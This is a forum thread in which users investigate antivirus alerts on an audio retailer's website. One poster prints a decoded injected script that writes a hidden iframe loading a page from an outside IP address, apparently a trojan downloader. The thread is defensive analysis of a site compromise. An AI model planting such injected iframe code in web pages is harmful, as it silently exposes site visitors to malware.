[DoubleEs]

Hi

Not sure if this is the right place to post this but has anyone been to the Woo Audio site lately?

The reason I'm asking is because for the last few days my AV have been going nuts everytime I try to go there.

My AV (Kaspersky) throws up an alert saying Trojan_Downloader.HTML.Agent.ij detected and block me from going there.

I have several PCs here but they're all running Kaspersky so I don't know if it's a false positive.

Has any of you guys been to the WA site in the past few days running a different AV and not getting any alert?

 

[Currawong]

Might be. If you look at the page source code, there's some kind of script added after the end html tag that could be a virus of some kind.

 

[Nebby]

after unescaping the string the following is the result:

Code:

[left]window.status='Done';document.write('<iframe name=7f046febc98 src=\'http://58.65.232.33/gpack/index.php?'+Math.round(Math.random()*182972)+'84e1e\' width=307 height=596 style=\'display: none\'></iframe>')[/left]

looks like it creates an iframe on the page that references the site 58.65.232.33; I'd say it's highly likely that Woo Audio has no idea that this was added to their site, and that it's a trojan

 

[Currawong]

Update: I found a decoder and the script at the bottom of all their pages contains an iframe that loads another site, presumably that contained a virus or trojan of some kind. The page that was loaded is now gone. I've sent a message using the woo audio contact page about it. Possibly the server hosting the site was compromised.

Edit: Nebby beat me to it.

 

[krmathis]

Sure looks to be!

 

[Nebby]

Well Currawong, I beat you to the forum post, but you beat me to the email to them

Btw, hello fellow Japan Head-fi'er! Shame you're on the other end of the country

 

[JZImages]

So what does this mean if I've been to the site the last couple days?

 

[Pangaea]

^ Go buy a Mac.

 

[jamato8]

Yeah, Macs rule!! :6)

 

[Nebby]

^holy long sig batman!

 

[JZImages]

Quote:

Originally Posted by Pangaea /img/forum/go_quote.gif ^ Go buy a Mac.

I have multiple Macs, but not all computers I surf the net with are Macs.

 

[Sovkiller]

Not sure where the hell you got this message from but I was right now on the Woo site and browsed all pages with no problems, and I have a PC, with NOD32, and no problems at all...

 

[Nebby]

Quote:

Originally Posted by Sovkiller /img/forum/go_quote.gif Not sure where the hell you got this message from but I was right now on the Woo site and browsed all pages with no problems, and I have a PC, with NOD32, and no problems at all...

The questionable line of code has already been removed from their site.

 

[Sovkiller]

Thanks God!!! Good to know!!!

 

[Ezer]

Scary stuff, I've also been browsing wooaudio within the past week or so and I didn't get any anti-virus pop ups (running AVG here). I'm using firefox with the noscript extension though, maybe that would've prevented the code from being run in the first place?